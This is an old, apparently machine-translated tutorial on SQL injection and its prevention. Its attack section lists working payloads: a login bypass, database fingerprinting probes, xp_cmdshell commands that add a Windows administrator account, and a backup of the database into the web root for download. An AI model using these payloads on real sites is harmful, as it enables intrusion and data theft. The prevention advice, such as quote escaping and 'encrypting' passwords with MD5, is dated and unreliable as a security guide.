SQL Injection and Prevention

<===================================== SQL injection and Prevention basics ==== ==================================>

Author: Liu Lan
Date: 2007-5-31

<======================================================== ========================================================== =>

Example:

Under normal circumstances: Select * from users where login = 'correct account' and Password = 'correct password'

What if I enter 'or ''=?

The SQL statement is changed:

Select * from users where login = ''or'' = ''and Password ='' or ''=''

Check if the condition after where becomes true ???

 

1. What is an SQL injection attack?

SQL Server injection attacks are attacks that use illegal SQL statements to fool the server and execute malicious operations.

2. Can I detect injection attacks on a website?

1). Step 1 (whether the attack can be performed)

Http: //.../url. aspx? Id = 1 and 1 = 1 normal display
Http: //.../url. aspx? Id = 1 and 1 = 2 content is blank

2). Step 2 (check which database is used by the server)

Http: //.../url. aspx? Id = 1 and (select count (*) from sysobjects)> 0
If the execution is successful, the server uses the SQL Server database.

Http: //.../url. aspx? Id = 1 and (select count (*) from msysobjects)> 0
If the execution is successful, the ACCESS database is used on the server.

3. How to launch an attack ???

1). inject SQL Server databases with system tables

Http: //.../url. aspx? Id = 1; Exec master .. xp_cmdshell "net user name password/Add "--
Note: The preceding statement creates a Windows account with the username and password

Http: //.../url. aspx? Id = 1; Exec master .. xp_cmdshell "net localgroup administrators name/Add "--
Note: add the new account name to the Administrator group (this command is only for the SA account; otherwise, you are not authorized to call the xp_mongoshell command)

2) view the databases and tables used by the server

Http: //.../url. aspx? Id = 1 and db_name ()> 0
Description: db_name ()> 0 is a system variable and the database name is returned.

Http: //.../url. aspx? Id = 1; backup database name to disk = 'C:/inetpub/wwwroot/1. db ';--
Note: Back up the database to the web directory and Use http to download the entire database (http: // localhost/1.db ).
After the download, restore the database 1. dB, and then you can see the data.

4. Causes of injection attacks

Attack method:
Select * from users where login = ''or'' = ''and Password ='' or ''=''

Cause: the dynamically generated SQL command does not verify the data entered by the user.

Attack method:
Exec master.. xp_mongoshell "Net user name password/Add

Cause: 1). SQL Vulnerability
2) database access permissions are designed as DBO permissions.

5. Attack prevention...
 
1). filter input content (replace all invalid characters)
Example: method 1 -- replace single quotes ("", ")

2) Check the validity of user input
Make sure that the entered content only contains valid data. Data check should be performed on both the client and server-the reason for the server-side verification,
It is to make up for the fragile security of the client authentication mechanism. You know, what the client submits is untrusted.

3). limiting the length of form or query string input is also a good embodiment of programming habits.

4). The stored procedure is used to complete the query. That is, the user has only the permission to execute the proc and has no operation on the table.

5). encrypt and save user login names, passwords, and other data, for example, MD5,
 
6). Check the number of records returned by the extracted data query.

IfProgramOnly one record is required to be returned, but more than one row is actually returned, which is treated as an error.

7). Minimum User Permissions

Generally, account SA permissions are not granted.